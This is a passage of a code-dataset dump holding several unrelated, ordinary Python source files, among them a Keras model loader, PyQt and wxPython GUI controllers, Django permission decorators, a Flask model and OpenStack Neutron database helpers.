self.debug.write(f'2\\n')\n if key is not None:\n if key.is_sequence:\n if key.name in self.escape:\n self._remove_wnd()\n self.debug.write(f'escape\\n')\n return None\n else:\n return key\n # else:\n # self.debug.write(f'3\\n')\n # self.echo(f'{key}')\n if self.modal:\n return None\n return key\n \n\n","sub_path":"simpleinterface/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":16052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"38137469","text":"import os\n\nfrom exceptions import NoModelException\nfrom keras.models import model_from_json\nfrom exceptions.NoModelException import NoModelException\nfrom modules.utils import batch_size, models\nfrom os.path import lexists\nfrom modules.tcp_poster import TCPPoster\nimport tensorflow as tf\nimport keras.backend as K\n\n\n# global graph\n# graph = tf.get_default_graph()\n\nclass Loader(TCPPoster):\n def __init__(self):\n super().__init__()\n self.path = None\n self.response = \"Failed to load model\"\n self.load_path_cache = \"\"\n\n def load(self, num=1, model_dir=None):\n try:\n loaded_json = None\n\n if model_dir is None:\n path = self.path + \"/Model-\" + str(num) + \"/\"\n else:\n path = self.path + \"/\" + model_dir + \"/\"\n\n # path = str(path, 'utf-8')\n if not lexists(path):\n self.response = \"No such file or directory\"\n return None\n\n with open(path + \"/model.json\", 'r') as f:\n loaded_json = f.read()\n\n try:\n loaded_model = model_from_json(loaded_json)\n loaded_model.load_weights(path + '/w.h5', \"r\")\n except OSError:\n self.response = \"No such file or directory\"\n return None\n except ValueError:\n self.response = \"Wrong classifier's json\"\n return None\n\n loaded_model.compile(loss=\"binary_crossentropy\", optimizer='RMSprop', metrics=[\"accuracy\"])\n # Выгрузка батч сайза из первого слоя LSTM\n batch_size(loaded_model.get_input_shape_at(0)[0])\n\n self.response = \"200 OK\"\n return loaded_model\n except FileNotFoundError:\n self.response = \"File not found\"\n return None\n\n def set_req(self, req):\n self.req = req\n\n def load_models(self):\n try:\n if self.req is None:\n self.response = \"Request is None\"\n return None\n\n self.path = self.req['load_path'].replace('\\\\', '/')\n\n # Проверка, загружали ли мы данную модель, если да, то не загружаем ее опять\n if self.load_path_cache == self.path:\n self.response = \"These models are already loaded\"\n return None\n\n if os.path.exists(self.path):\n lst = os.listdir(self.path)\n for model_path in lst:\n if 'Model' in model_path:\n spl = model_path.split('-')\n num = spl[-1]\n # Сохраняем тензорфлоу граф рядом с моделью, которая относится к этому графу\n graph = tf.get_default_graph()\n model = self.load(model_dir=model_path)\n if model is not None:\n # Мапа : номер модели, кортеж (модель, ее граф)\n models(num, (model, graph))\n print(\"Loading model-\" + str(num))\n K.clear_session()\n else:\n return None\n self.load_path_cache = self.path\n self.response = \"200 OK\"\n else:\n self.response = \"File not found\"\n\n except FileNotFoundError:\n self.response = \"File not found\"\n return None\n","sub_path":"modules/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"213010153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 12 00:36:37 2015\n\n@author: root\n\"\"\"\n\nimport sys\nimport os\nfrom PyQt4 import Qt, QtCore, 
QtGui\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\nfrom aware import *\nfrom data import *\nfrom hmi import *\nimport threading\n\nfrom communication import *\n#from provider import Provider\n#from modbusLink import ModbusLink\n\ncom2 = COMM(type=\"Modbus\",port='/dev/ttyACM0', adress=1)\n\napp = QtGui.QApplication(sys.argv) \nwindow = QtGui.QWidget()\n\ndial = Dial()\ndial.setRange(0,255)\n#dial.setScale(0,1.0,0.1)\n\nslider = Slider()\nslider.range(0,255)\n\nbotao = OnOffButton()\nbotao.textTrue = \"Ligado\"\nbotao.textFalse = \"Desligado\"\n\ntagSlider = Tag(Identity(0,\"TagSlider\"), 0, True)\nadaptador = AdapterContinuous(0,0,slider,\"value\",tagSlider,\"value\",3)\ntagSlider._adapter = adaptador\ntagSlider._scan = 0.1\ntagSlider.providerEnable = False\n\ntagGeradora2 = Tag()\ntagGeradora2._scan = 0.01\nadaptador2 = AdapterContinuous(0,0,tagGeradora2,\"value\",tagSlider,\"value\",4)\ntagGeradora2._adapter = adaptador2\ncomm2 = ModbusLink(board=com2, name=\"LedValor\",register=1)\ntagGeradora2.provider = comm2\n#tagGeradora2.attach(comm2)\ntagGeradora2.providerEnable = False\n\n\ntagGeradora3 = Tag()\ntagGeradora3._scan = 0.01\nadaptador3 = AdapterContinuous(0,0,dial,\"value\",tagGeradora3,\"value\",1)\ntagGeradora3._adapter = adaptador3\ncomm3 = ModbusLink(board=com2, name=\"LedValor\",register=1)\ntagGeradora3.provider = comm3\n#agGeradora3.attach(comm3)\ntagGeradora3.providerEnable = True\n\n\ntagBotao = Tag()\ntagBotao._scan = 0.0\ntagBotao._adapter = AdapterContinuous(0,0, botao,\"value\", tagBotao, \"value\", 3)\na =ModbusLink(board=com2, name=\"Boato\",register=0)\ntagBotao.provider = a\ntagBotao.providerEnable = False\n\nlayout = QtGui.QVBoxLayout()\nlayout.addWidget(dial)\nlayout.addWidget(slider)\nlayout.addWidget(botao)\n\nscan = Scan(0.1)\nscan.add(tagSlider)\nscan.add(tagGeradora2)\nscan.add(tagGeradora3)\nscan.add(tagBotao)\n\nGeradorThread = threading.Thread(target=scan.run, ) \nGeradorThread.setDaemon(True)\nGeradorThread.start()\n\nwindow.setLayout(layout)\nwindow.setGeometry(50,100,300,500)\nwindow.show()\n\n\n\nsys.exit(app.exec_()) ","sub_path":"olds/tests/communication/test08.py","file_name":"test08.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590764371","text":"\"\"\"\nProject Euler Problem #4\nAuthor: Mohammed Fahad Kaleem\n\nTime:0.579291 seconds\n\nProblem:\n Find the largest palindrome made from the product of two 3-digit numbers.\n\nExample:\n A palindromic number reads the same both ways.\n The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\n\"\"\"\nimport time\n\n\nclass Solution(object):\n def largest_palindrome(self):\n max = 0\n for x in range(100,1000):\n for y in range(100,1000):\n product = x * y\n product_string = str(product)\n if self.is_palindrome(product_string):\n if product > max:\n max = product\n return max\n\n def is_palindrome(self, str):\n return str == str[::-1]\n\n\nif __name__ == \"__main__\":\n start = time.clock()\n solution = Solution().largest_palindrome()\n elapsed = time.clock() - start\n print(\"The largest palindrome made from the product of 3-digit numbers is: %s\"%solution)\n print(\"Time:%s seconds\" % elapsed)","sub_path":"Python/pe_004.py","file_name":"pe_004.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564693403","text":"from denim.environment import 
EnvironmentCallableTask\n\n__all__ = ('deploy_env', )\n\n\ndef deploy_env(*args, **kwargs):\n \"\"\"\n Decorator declaring the wrapped function defines a deploy environment.\n\n May be invoked as a simple, argument-less decorator (i.e. ``@task``) or\n with arguments customizing its behavior (e.g. ``@task(alias='myalias')``).\n\n This decorator is essentially the same to the\n :ref:`new-style task ` see that decorator for details on\n how to use this decorator.\n\n \"\"\"\n invoked = bool(not args or kwargs)\n task_class = kwargs.pop(\"task_class\", EnvironmentCallableTask)\n if not invoked:\n func, args = args[0], ()\n\n def wrapper(func):\n return task_class(func, *args, **kwargs)\n\n return wrapper if invoked else wrapper(func)\n","sub_path":"denim/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41895120","text":"'''\r\nCreated on Sep 7, 2017\r\n\r\n@author: Firklaag_xps\r\n'''\r\nimport wx\r\nimport math\r\nfrom TSP_MileStone_3.tsp_viewer_layer import TspGui, AdditionDialog\r\nfrom TSP_MileStone_3.tsp_model_layer import TspTableDAO, FileModel\r\nfrom TSP_MileStone_3.tsp_solver_module import TspSolver\r\n\r\nAUTHOR = \"Yan Wang\"\r\nALGORITHM = \"Simulated Annealing\"\r\n\r\nclass GuiController(object):\r\n \r\n def __init__(self):\r\n self.dao = TspTableDAO()\r\n self.file_reader = FileModel()\r\n self.solver = TspSolver()\r\n \r\n app = wx.App() \r\n self.gui = TspGui(self)\r\n self.gui.Show(show=True)\r\n app.MainLoop()\r\n #-----------------------------------------------------------------------------\r\n '''\r\n ADD. \r\n '''\r\n def add(self, event):\r\n ''' read the file '''\r\n path = self.gui.file_picker.GetPath()\r\n path = path.strip()\r\n \r\n if len(path) == 0:\r\n self.gui.updateStatusBar(\"Target file cannot be empty.\")\r\n return\r\n \r\n saver = self.file_reader.read_file(path)\r\n \r\n ''' check if exist '''\r\n if self.dao.tProblemExist(saver.name):\r\n self.gui.updateStatusBar(\"Problem %s exist.\" % saver.name)\r\n return\r\n else:\r\n ''' save problem in database'''\r\n self.dao.tProblemSave(saver.name, saver.dim, saver.comm)\r\n self.dao.tCitiesSave(saver.nodes)\r\n \r\n ''' display '''\r\n dot_x, dot_y = [], []\r\n for dot in saver.nodes:\r\n dot_x.append(dot[2])\r\n dot_y.append(dot[3])\r\n self.gui.manipulateDiagram(dot_x, dot_y, None, 0)\r\n \r\n ''' update ui '''\r\n self.update(\"ADD\", str(saver.name), str(saver.dim))\r\n self.gui.updateStatusBar(\"Add cities %s success.\" % saver.name)\r\n #------------------------------------------------------------------------------\r\n '''\r\n SOLVE\r\n '''\r\n def solve(self, event):\r\n ''' gather the parameters '''\r\n problem = self.gui.list_prob.GetStringSelection()\r\n if len(problem) == 0:\r\n self.gui.updateStatusBar(\"Please select a problem.\")\r\n return\r\n problem = problem.split(\"|\")[0].strip()\r\n isSave = self.gui.is_save.IsChecked()\r\n maximum_time = int(self._showDialog())\r\n if maximum_time == 0:\r\n return\r\n \r\n ''' load the problem '''\r\n nodesList = self.dao.tCitiesFindAll(problem)\r\n tsp_map = self.built(nodesList)\r\n self.gui.updateStatusBar(\"Problem map built complete, please wait for %s seconds\" % maximum_time)\r\n \r\n ''' solve problem '''\r\n dot_x, dot_y = [], []\r\n for dot in nodesList:\r\n dot_x.append(dot[0])\r\n dot_y.append(dot[1])\r\n self.gui.manipulateDiagram(dot_x, dot_y, None, 0)\r\n \r\n# threading.Timer(0, self._showProgressBar, 
[maximum_time]).start()\r\n \r\n tourLen, tour = self.solver.solver(tsp_map, maximum_time)\r\n tour = [i + 1 for i in tour]\r\n \r\n self.gui.updateStatusBar(\"Operation complete! current best tour length is %s.\" % tourLen)\r\n self.gui.manipulateDiagram(dot_x, dot_y, tour, 0.1)\r\n \r\n ''' save the problem or not '''\r\n if isSave:\r\n tour = [str(i) for i in tour]\r\n tour.append(\"-1\")\r\n d_tour = \" \".join(tour)\r\n self.dao.tSolutionSave(problem, tourLen, AUTHOR, ALGORITHM, maximum_time, d_tour)\r\n self.gui.updateStatusBar(\"Save current solution into database.\")\r\n \r\n ''' update gui '''\r\n self.update(\"CON\", ALGORITHM, AUTHOR)\r\n #------------------------------------------------------------------------------\r\n '''\r\n FETCH\r\n '''\r\n def fetch(self, event):\r\n ''' gather the parameters '''\r\n problem = self.gui.list_prob.GetStringSelection()\r\n if len(problem) == 0:\r\n self.gui.updateStatusBar(\"Please select a problem.\")\r\n return\r\n problem = problem.split(\"|\")[0].strip()\r\n \r\n shorestModel = self.gui.is_shortest.IsChecked()\r\n \r\n author, algorithm = \"\",\"\"\r\n \r\n if self.gui.author_choice.GetSelection() != 0:\r\n author = self.gui.author_choice.GetStringSelection().strip()\r\n \r\n if self.gui.algo_choice.GetSelection() != 0:\r\n algorithm = self.gui.algo_choice.GetStringSelection().strip()\r\n \r\n ''' read data '''\r\n nodesList = self.dao.tCitiesFindAll(problem)\r\n solution = self.fetchSolution(problem, shorestModel, author, algorithm)\r\n if solution is None:\r\n self.gui.updateStatusBar(\"No current solution for %s\" % problem)\r\n return\r\n \r\n tour = solution.tour \r\n self.gui.updateStatusBar(solution.toString())\r\n ''' display '''\r\n dot_x, dot_y = [], []\r\n for dot in nodesList:\r\n dot_x.append(dot[0])\r\n dot_y.append(dot[1])\r\n self.gui.manipulateDiagram(dot_x, dot_y, tour, 0.1)\r\n #-------------------------------------------------------------------------------------------------\r\n \r\n def fetchSolution(self, problem, shorestModel, author, algorithm):\r\n sql = \"select * from Solution where ProblemName = '%s' \" % problem\r\n \r\n if author != \"\": sql += \"and Author = '%s' \" % author\r\n \r\n if algorithm != \"\": sql += \"and Algorithm = '%s' \" % algorithm\r\n \r\n if shorestModel: sql += \"order by TourLength;\"\r\n else: sql += \"order by Date;\"\r\n \r\n return self.dao.tSolutionFind(sql)\r\n #--------------------------------------------------------------------------------------------------\r\n \r\n def update(self, element, *item):\r\n if element == 'ADD':\r\n self.gui.updateListBox(self._tspFormat(item[0], item[1]))\r\n if element == 'CON':\r\n self.gui.updateCondition(item[0], item[1])\r\n #----------------------------------------------------------------------------------------------------\r\n \r\n def fetchTspList(self):\r\n problems = []\r\n rows = self.dao.tProblemFinadAll()\r\n for l in rows:\r\n problems.append(self._tspFormat(str(l[0]), str(l[1])))\r\n return problems\r\n #---------------------------------------------------------------------------------------------------\r\n \r\n def fetchAut_AlgList(self):\r\n algorithms = [u\"-- SELECT ALGORITHM --\"]\r\n authors = [u\"-- SELECT AUTHOR --\"]\r\n \r\n al_rows = self.dao.tSolutionGroupByAlgorithm()\r\n au_rows = self.dao.tSolutionGroupByAuthor()\r\n \r\n for al in al_rows:\r\n algorithms.append(u\"%s\" % al[0])\r\n for au in au_rows:\r\n authors.append(u\"%s\" % au[0]) \r\n \r\n return algorithms, authors\r\n 
#---------------------------------------------------\r\n# def _showProgressBar(self, timeCost):\r\n# bar = ProgressBar(timeCost)\r\n# bar.progess()\r\n \r\n def _showDialog(self):\r\n dialog = AdditionDialog()\r\n result = dialog.ShowModal()\r\n timeCost = 0\r\n if result == wx.ID_OK:\r\n timeCost = dialog.timeCost.GetValue()\r\n \r\n dialog.Destroy()\r\n return timeCost\r\n #-----------------------------------------------------------------------------------------------------------------\r\n def _tspFormat(self, name, size):\r\n name = name.strip()\r\n size = size.strip()\r\n return u\"%s | (Size: %s)\" % (name.ljust(12), size.center(5))\r\n #-----------------------------------------------------------------------------------------------------------------\r\n \r\n ''' return the distance between two points'''\r\n def _dist(self, p_1, p_2):\r\n return math.sqrt((p_2[0] - p_1[0]) ** 2 + (p_2[1] - p_1[1]) ** 2) \r\n #-----------------------------------------------------------------------------------------------------------------\r\n \r\n ''' bulit the map. get the distance every node to each others '''\r\n def built(self, nodes):\r\n dim = len(nodes)\r\n tsp_map = dict()\r\n print(\"LOG -- Start to build distance map, dimension:\", dim)\r\n print(\"WARNING -- If the dimension is too large, it could take a while.\")\r\n for i in range(dim):\r\n dists = []\r\n for j in range(dim):\r\n dists.append(round(self._dist(nodes[i], nodes[j]), 1))\r\n tsp_map[i] = dists\r\n return tsp_map \r\n #------------------------------------------------------------------------------------------------------------------","sub_path":"1810ICT_SDP_Assignment/TSP_MileStone_3/tsp_controller_layer.py","file_name":"tsp_controller_layer.py","file_ext":"py","file_size_in_byte":8688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"336718374","text":"# -*- coding: utf-8 -*-\n\nfrom django.http import HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.utils.encoding import force_str\nfrom django.contrib.auth import REDIRECT_FIELD_NAME\n\nfrom adminpanel.models import Permission\nfrom account.models import Userdetail\nfrom ucenter.models import UserValidate\n\nimport json\n\n# from pprint import pprint\n\n\ndef loginRequired(func=None, redirect_field_name=REDIRECT_FIELD_NAME):\n def _deco(request, *arg, **kwargs):\n if request.user.is_authenticated():\n return func(request, *arg, **kwargs)\n\n path = request.get_full_path()\n adminLoginUrl = force_str(reverse('adminpanel_login'))\n\n from django.contrib.auth.views import redirect_to_login\n return redirect_to_login(\n path, adminLoginUrl, redirect_field_name)\n\n return _deco\n\n\ndef sysPermission(module, action, redirect_field_name=REDIRECT_FIELD_NAME):\n def _handler(func):\n def _deco(request, *arg, **kwargs):\n\n # 用户未登录\n if not request.user.is_authenticated():\n path = request.get_full_path()\n adminLoginUrl = force_str(reverse('adminpanel_login'))\n\n from django.contrib.auth.views import redirect_to_login\n return redirect_to_login(\n path, adminLoginUrl, redirect_field_name)\n\n perm = Permission.objects.filter(module=module, action=action)\n perm = perm.get() if perm else None\n\n uv = UserValidate.objects.get(user=request.user)\n ud = Userdetail.objects.get(uservalidate=uv)\n userPerms = ud.group.permissions.all()\n if perm and perm in userPerms:\n return func(request, *arg, **kwargs)\n\n from adminpanel.views import error\n if action == 'index':\n return error(request, {'error': 
\"您没有权限这么做!\", 'url': '/'})\n else:\n return error(request, {'error': \"您没有权限这么做!\"})\n return _deco\n return _handler\n\n\ndef sysPermissionAJAX(module, action):\n def _handler(func):\n def _deco(request, *arg, **kwargs):\n\n # 用户未登录\n if not request.user.is_authenticated():\n return HttpResponse(json.dumps({'status': False, 'message': \"您尚未登录!\"}))\n\n perm = Permission.objects.filter(module=module, action=action)\n perm = perm.get() if perm else None\n\n uv = UserValidate.objects.get(user=request.user)\n ud = Userdetail.objects.get(uservalidate=uv)\n userPerms = ud.group.permissions.all()\n if perm and perm in userPerms:\n return func(request, *arg, **kwargs)\n\n return HttpResponse(json.dumps({'status': False, 'message': \"您没有权限这么做!\"}))\n\n return _deco\n return _handler\n","sub_path":"wizcloud/adminpanel/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615666846","text":"import requests\nfrom requests_oauthlib import OAuth1\nimport json\n\nfrom api_keys import *\n\nurl = 'https://api.twitter.com/1.1/search/tweets.json'\nauth = OAuth1(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET,\n TWITTER_TOKEN, TWITTER_TOKEN_SECRET)\n\ndef get_tweets(query_text, count):\n url_query = url + '?q=' + query_text + '&count=' + str(count)\n response = requests.get(url_query, auth=auth)\n\n tweet_list = []\n if response.status_code == requests.codes.ok:\n data = json.loads(response.text)\n for tweet in data['statuses']:\n tweet_list.append('@' + tweet['user']['screen_name'] + ': ' + tweet['text'])\n\n return tweet_list\n\nprint (get_tweets('hackbright', 10))\n\n","sub_path":"ch15/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289971999","text":"from dataclasses import dataclass\nimport re\nfrom app.configs.database import db\nfrom app.exceptions.shipping_company_exc import InvalidKeysError, InvalidTypeError, ShippingCompanyNotFound, InvalidCnpjFormatError\nfrom app.services.helper import DefaultModel\nfrom sqlalchemy import Column, Float, Integer, String\nfrom sqlalchemy.orm import validates\n\n\n@dataclass\nclass ShippingCompanyModel(db.Model, DefaultModel):\n\n name: str\n cnpj: str\n rate: str\n \n\n __tablename__ = 'shipping_companies'\n\n shipping_company_id = Column(Integer, primary_key=True)\n name = Column(String(127), nullable=False)\n cnpj = Column(String(100), nullable=False, unique=True)\n rate = Column(Float)\n minimum_shipping_price = Column(Integer, default=0)\n\n\n @validates('name')\n def validate_string_type(self, key, value):\n if type(value) != str:\n raise InvalidTypeError(f'{key} must be a string type.')\n\n return value\n\n @validates('cnpj')\n def validate_cnpj_pattern(self, key, value):\n if type(value) != str:\n raise InvalidTypeError(f'{key} must be a string type.')\n\n string = value\n pattern = '\\d{2}\\.\\d{3}\\.\\d{3}\\/\\d{4}\\-\\d{2}'\n\n if not re.fullmatch(pattern, string):\n raise InvalidCnpjFormatError(\"Invalid cnpj format. 
Valid format: '00.000.000/0000-00'\")\n\n return value\n\n @validates('rate')\n def validate_rate_type(self, key, value):\n if type(value) != float:\n raise InvalidTypeError(f'{key} must be a float type.')\n\n return value\n\n def update(self, data):\n try:\n ShippingCompanyModel(**data)\n except TypeError:\n keys = ('name', 'cnpj', 'rate')\n raise InvalidKeysError(f\"Invalid Keys in body. Accepted Keys:{', '.join(keys)}\")\n\n for key, value in data.items():\n setattr(self, key, value)\n \n self.save_self()\n\n @staticmethod\n def shipping_company_verify(shipping_company_id):\n shipping_company: ShippingCompanyModel = ShippingCompanyModel.query.get(shipping_company_id)\n\n if not shipping_company:\n raise ShippingCompanyNotFound('Shipping company not found.')\n\n return shipping_company\n","sub_path":"app/models/shipping_company_model.py","file_name":"shipping_company_model.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"582283809","text":"import threads\n\nclass Controller:\n\n def __init__(self):\n self.mangasFound = []\n self.chaptersFound = []\n\n self.threadOnRunMangas = threads.OnRunMangas()\n self.threadOnRunMangas.sendData.connect(self.updateListManga)\n self.threadOnRunMangas.started.connect(self.searchStarted)\n self.threadOnRunMangas.finished.connect(self.searchFinished)\n\n self.threadOnRunChapters = threads.OnRunChapters()\n self.threadOnRunChapters.sendData.connect(self.updateListChapter)\n\n self.threadOnRunPages = threads.OnRunPages()\n self.threadOnRunPages.started.connect(self.downloadStarted)\n self.threadOnRunPages.finished.connect(self.downloadFinished)\n \n def setupUi(self, ui):\n self.ui = ui\n\n def updateListManga(self, data):\n self.ui.listWidgetManga.clear()\n if len(data) != 0:\n \n self.mangasFound.clear()\n self.mangasFound.extend(data)\n \n for i in data:\n self.ui.listWidgetManga.addItem(i.__str__())\n self.ui.buttonChapters.setEnabled(True)\n else:\n self.ui.showMessage('oops', 'Nenhum manga encontrado!')\n\n def updateListChapter(self, data):\n self.ui.listWidgetChapter.clear()\n if len(data) != 0:\n \n self.chaptersFound.clear()\n self.chaptersFound.extend(data)\n\n for i in data:\n self.ui.listWidgetChapter.addItem(i.__str__())\n \n self.chapterFinished()\n\n else:\n self.ui.showMessage('oops', 'Nenhum capitulo encontrado!')\n\n def searchManga(self):\n\n if self.emptyTextSearch():\n self.ui.buttonChapters.setEnabled(False)\n self.threadOnRunMangas.load(self.ui.textSearch.toPlainText())\n self.threadOnRunMangas.start()\n else:\n self.ui.showMessage('Ei', 'Digite algo antes!')\n\n def searchChapter(self):\n item = self.ui.listWidgetManga.selectedItems()\n if len(item) != 0:\n itemSearch = self.mangasFound[self.ui.listWidgetManga.currentRow()]\n self.threadOnRunChapters.load(itemSearch)\n self.threadOnRunChapters.OnChapters()\n \n def selectAll(self):\n self.ui.listWidgetChapter.selectAll()\n\n def download(self):\n if len(self.ui.listWidgetChapter.selectedItems()) == 0: return\n\n si = self.ui.listWidgetChapter.selectedIndexes()\n tempList = []\n for i in si:\n tempList.append(self.chaptersFound[i.row()])\n\n self.threadOnRunPages.load(tempList)\n self.threadOnRunPages.start()\n\n def setProgress(self, value):\n self.threadOnRunPages.update.connect(value)\n\n def searchStarted(self):\n self.ui.buttonSearch.setEnabled(False)\n \n def searchFinished(self):\n self.ui.buttonSearch.setEnabled(True)\n \n def downloadStarted(self):\n 
self.ui.buttonDownload.setEnabled(False)\n\n def downloadFinished(self):\n self.ui.buttonDownload.setEnabled(True)\n self.ui.showMessage('Manga', 'Download Completo!')\n\n def chapterFinished(self):\n self.ui.buttonSelectAll.setEnabled(True)\n self.ui.buttonDownload.setEnabled(True)\n\n def emptyTextSearch(self):\n return self.ui.textSearch.toPlainText() != ''\n","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475945744","text":"# Copyright (c) 2013 OpenStack Foundation.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib import constants as const\nfrom oslo_serialization import jsonutils\nfrom oslo_utils import timeutils\n\nfrom neutron.db.models import agent as agent_model\nfrom neutron.db.models import l3ha as l3ha_model\nfrom neutron.db import models_v2\nfrom neutron.plugins.ml2 import models as ml2_models\n\n\nHA_ROUTER_PORTS = (const.DEVICE_OWNER_HA_REPLICATED_INT,\n const.DEVICE_OWNER_ROUTER_SNAT)\n\n\ndef get_agent_ip_by_host(session, agent_host):\n agent = get_agent_by_host(session, agent_host)\n if agent:\n return get_agent_ip(agent)\n\n\ndef get_agent_ip(agent):\n configuration = jsonutils.loads(agent.configurations)\n return configuration.get('tunneling_ip')\n\n\ndef get_agent_uptime(agent):\n return timeutils.delta_seconds(agent.started_at,\n agent.heartbeat_timestamp)\n\n\ndef get_agent_tunnel_types(agent):\n configuration = jsonutils.loads(agent.configurations)\n return configuration.get('tunnel_types')\n\n\ndef get_agent_l2pop_network_types(agent):\n configuration = jsonutils.loads(agent.configurations)\n return configuration.get('l2pop_network_types')\n\n\ndef get_agent_by_host(session, agent_host):\n \"\"\"Return a L2 agent on the host.\"\"\"\n\n with session.begin(subtransactions=True):\n query = session.query(agent_model.Agent)\n query = query.filter(agent_model.Agent.host == agent_host)\n for agent in query:\n if get_agent_ip(agent):\n return agent\n\n\ndef _get_active_network_ports(session, network_id):\n with session.begin(subtransactions=True):\n query = session.query(ml2_models.PortBinding, agent_model.Agent)\n query = query.join(agent_model.Agent,\n agent_model.Agent.host == ml2_models.PortBinding.host)\n query = query.join(models_v2.Port)\n query = query.filter(models_v2.Port.network_id == network_id,\n models_v2.Port.status == const.PORT_STATUS_ACTIVE)\n return query\n\n\ndef _ha_router_interfaces_on_network_query(session, network_id):\n query = session.query(models_v2.Port)\n query = query.join(l3ha_model.L3HARouterAgentPortBinding,\n l3ha_model.L3HARouterAgentPortBinding.router_id ==\n models_v2.Port.device_id)\n return query.filter(\n models_v2.Port.network_id == network_id,\n models_v2.Port.device_owner.in_(HA_ROUTER_PORTS))\n\n\ndef _get_ha_router_interface_ids(session, network_id):\n query = _ha_router_interfaces_on_network_query(session, network_id)\n return 
query.from_self(models_v2.Port.id).distinct()\n\n\ndef get_nondistributed_active_network_ports(session, network_id):\n query = _get_active_network_ports(session, network_id)\n # Exclude DVR and HA router interfaces\n query = query.filter(models_v2.Port.device_owner !=\n const.DEVICE_OWNER_DVR_INTERFACE)\n ha_iface_ids_query = _get_ha_router_interface_ids(session, network_id)\n query = query.filter(models_v2.Port.id.notin_(ha_iface_ids_query))\n return [(bind, agent) for bind, agent in query.all()\n if get_agent_ip(agent)]\n\n\ndef get_dvr_active_network_ports(session, network_id):\n with session.begin(subtransactions=True):\n query = session.query(ml2_models.DistributedPortBinding,\n agent_model.Agent)\n query = query.join(agent_model.Agent,\n agent_model.Agent.host ==\n ml2_models.DistributedPortBinding.host)\n query = query.join(models_v2.Port)\n query = query.filter(models_v2.Port.network_id == network_id,\n models_v2.Port.status == const.PORT_STATUS_ACTIVE,\n models_v2.Port.device_owner ==\n const.DEVICE_OWNER_DVR_INTERFACE)\n return [(bind, agent) for bind, agent in query.all()\n if get_agent_ip(agent)]\n\n\ndef get_distributed_active_network_ports(session, network_id):\n return (get_dvr_active_network_ports(session, network_id) +\n get_ha_active_network_ports(session, network_id))\n\n\ndef get_ha_active_network_ports(session, network_id):\n agents = get_ha_agents(session, network_id=network_id)\n return [(None, agent) for agent in agents]\n\n\ndef get_ha_agents(session, network_id=None, router_id=None):\n query = session.query(agent_model.Agent.host).distinct()\n query = query.join(l3ha_model.L3HARouterAgentPortBinding,\n l3ha_model.L3HARouterAgentPortBinding.l3_agent_id ==\n agent_model.Agent.id)\n if router_id:\n query = query.filter(\n l3ha_model.L3HARouterAgentPortBinding.router_id == router_id)\n elif network_id:\n query = query.join(models_v2.Port, models_v2.Port.device_id ==\n l3ha_model.L3HARouterAgentPortBinding.router_id)\n query = query.filter(models_v2.Port.network_id == network_id,\n models_v2.Port.status == const.PORT_STATUS_ACTIVE,\n models_v2.Port.device_owner.in_(HA_ROUTER_PORTS))\n else:\n return []\n # L3HARouterAgentPortBinding will have l3 agent ids of hosting agents.\n # But we need l2 agent(for tunneling ip) while creating FDB entries.\n agents_query = session.query(agent_model.Agent)\n agents_query = agents_query.filter(agent_model.Agent.host.in_(query))\n return [agent for agent in agents_query\n if get_agent_ip(agent)]\n\n\ndef get_ha_agents_by_router_id(session, router_id):\n return get_ha_agents(session, router_id=router_id)\n\n\ndef get_agent_network_active_port_count(session, agent_host,\n network_id):\n with session.begin(subtransactions=True):\n query = session.query(models_v2.Port)\n query1 = query.join(ml2_models.PortBinding)\n query1 = query1.filter(models_v2.Port.network_id == network_id,\n models_v2.Port.status ==\n const.PORT_STATUS_ACTIVE,\n models_v2.Port.device_owner !=\n const.DEVICE_OWNER_DVR_INTERFACE,\n ml2_models.PortBinding.host == agent_host)\n\n ha_iface_ids_query = _get_ha_router_interface_ids(session, network_id)\n query1 = query1.filter(models_v2.Port.id.notin_(ha_iface_ids_query))\n ha_port_count = get_ha_router_active_port_count(\n session, agent_host, network_id)\n\n query2 = query.join(ml2_models.DistributedPortBinding)\n query2 = query2.filter(models_v2.Port.network_id == network_id,\n ml2_models.DistributedPortBinding.status ==\n const.PORT_STATUS_ACTIVE,\n models_v2.Port.device_owner ==\n const.DEVICE_OWNER_DVR_INTERFACE,\n 
